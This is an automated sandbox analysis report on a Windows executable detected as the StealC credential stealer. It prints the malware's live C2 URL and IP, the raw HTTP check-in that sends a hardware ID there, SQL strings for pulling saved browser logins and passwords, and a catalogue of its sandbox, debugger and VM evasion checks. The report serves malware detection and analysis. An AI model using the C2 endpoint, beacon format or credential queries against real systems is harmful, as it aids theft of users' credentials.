Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1531318
MD5:9c7193e94b13d7380dccc18b19a95158
SHA1:4d69fe7afa38cf9fa65fd5acd25e66bc6ad230b4
SHA256:480374d99e5a098171a92a8b09b3a6fb5a43c216e21d328e6c17d87b5d12c2f0
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9C7193E94B13D7380DCCC18B19A95158)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2004JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2004JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.cb0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-11T01:49:59.923701+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.cb0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00CBC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00CB9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00CB7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00CB9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00CC8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00CC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00CBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00CBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00CC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00CBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00CC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00CBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBDE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="hwid"F45FABC315104081907672------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="build"doma------GDGHJEHJJDAAAKEBGCFC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00CB4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 34 35 46 41 42 43 33 31 35 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 2d 2d 0d 0a Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="hwid"F45FABC315104081907672------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="build"doma------GDGHJEHJJDAAAKEBGCFC--
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1706114024.00000000018F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4&ne
                Source: file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpd&
                Source: file.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.373h
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37eE

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C0_2_0107992C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010851C60_2_010851C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100381A0_2_0100381A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107E8A90_2_0107E8A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106F8F30_2_0106F8F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA92B70_2_00FA92B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011743C10_2_011743C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010713F80_2_010713F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0112150F0_2_0112150F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F9E44E0_2_00F9E44E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7BC490_2_00F7BC49
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01077DD10_2_01077DD1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010887550_2_01088755
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107CF780_2_0107CF78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01081E160_2_01081E16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5D7D70_2_00F5D7D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB27B90_2_00FB27B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01072E6B0_2_01072E6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F8A7710_2_00F8A771
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00CB45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qlydljbc ZLIB complexity 0.9947369304234428
                Source: file.exe, 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00CC8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00CC3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9XHW8LHR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT url FROM urls LIMIT 1000;
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM loginsi;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1825280 > 1048576
                Source: file.exeStatic PE information: Raw size of qlydljbc is bigger than: 0x100000 < 0x197600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.cb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qlydljbc:EW;jrcyigtg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qlydljbc:EW;jrcyigtg:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CC9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c42de should be: 0x1c8a57
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qlydljbc
                Source: file.exeStatic PE information: section name: jrcyigtg
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B3906 push esi; mov dword ptr [esp], ecx0_2_010B3DC9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114790D push esi; mov dword ptr [esp], ecx0_2_01147863
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push eax; mov dword ptr [esp], esi0_2_01079959
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebp; mov dword ptr [esp], 0DBB4929h0_2_010799ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 6476BFF4h; mov dword ptr [esp], ebx0_2_01079A0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 36B5E66Eh; mov dword ptr [esp], edi0_2_01079AE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebp; mov dword ptr [esp], esi0_2_01079AE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push esi; mov dword ptr [esp], ebx0_2_01079AF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ecx; mov dword ptr [esp], esi0_2_01079B24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push eax; mov dword ptr [esp], 0E57E0EAh0_2_01079B32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ecx; mov dword ptr [esp], edi0_2_01079C1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 153E3B40h; mov dword ptr [esp], edi0_2_01079C6B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ecx; mov dword ptr [esp], esi0_2_01079C84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push eax; mov dword ptr [esp], ebx0_2_01079CB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push edx; mov dword ptr [esp], ecx0_2_01079CDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebp; mov dword ptr [esp], 5C93D611h0_2_01079D19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 20B823CFh; mov dword ptr [esp], edi0_2_01079D75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebp; mov dword ptr [esp], 396F5BA5h0_2_01079D88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 10FE46AAh; mov dword ptr [esp], edi0_2_01079DE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 63CF2A32h; mov dword ptr [esp], edi0_2_01079E21
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push edx; mov dword ptr [esp], ecx0_2_01079F8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push edi; mov dword ptr [esp], edx0_2_01079FD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 00E320EFh; mov dword ptr [esp], edi0_2_01079FDD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push esi; mov dword ptr [esp], edx0_2_01079FF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 6B284A9Ah; mov dword ptr [esp], ebp0_2_0107A01F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 7C4B119Ah; mov dword ptr [esp], edi0_2_0107A04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebx; mov dword ptr [esp], 3393174Bh0_2_0107A09B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ebx; mov dword ptr [esp], 2CB3E040h0_2_0107A0DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push esi; mov dword ptr [esp], 747D05C7h0_2_0107A110
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push ecx; mov dword ptr [esp], esi0_2_0107A221
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107992C push 23319677h; mov dword ptr [esp], ebx0_2_0107A250
                Source: file.exeStatic PE information: section name: qlydljbc entropy: 7.95389639217539

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CC9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13568
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F12210 second address: F12214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F11A49 second address: F11A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D56E second address: 108D576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D576 second address: 108D583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D583 second address: 108D58D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3971C776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C6AD second address: 108C6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C6B1 second address: 108C6B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C6B5 second address: 108C6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBD38EF6166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108C9D0 second address: 108C9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBD3971C786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CCEE second address: 108CD0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBD38EF616Fh 0x0000000a jns 00007FBD38EF6166h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108F4EB second address: 108F50F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD3971C77Ch 0x00000008 jp 00007FBD3971C776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edi 0x00000013 jp 00007FBD3971C778h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
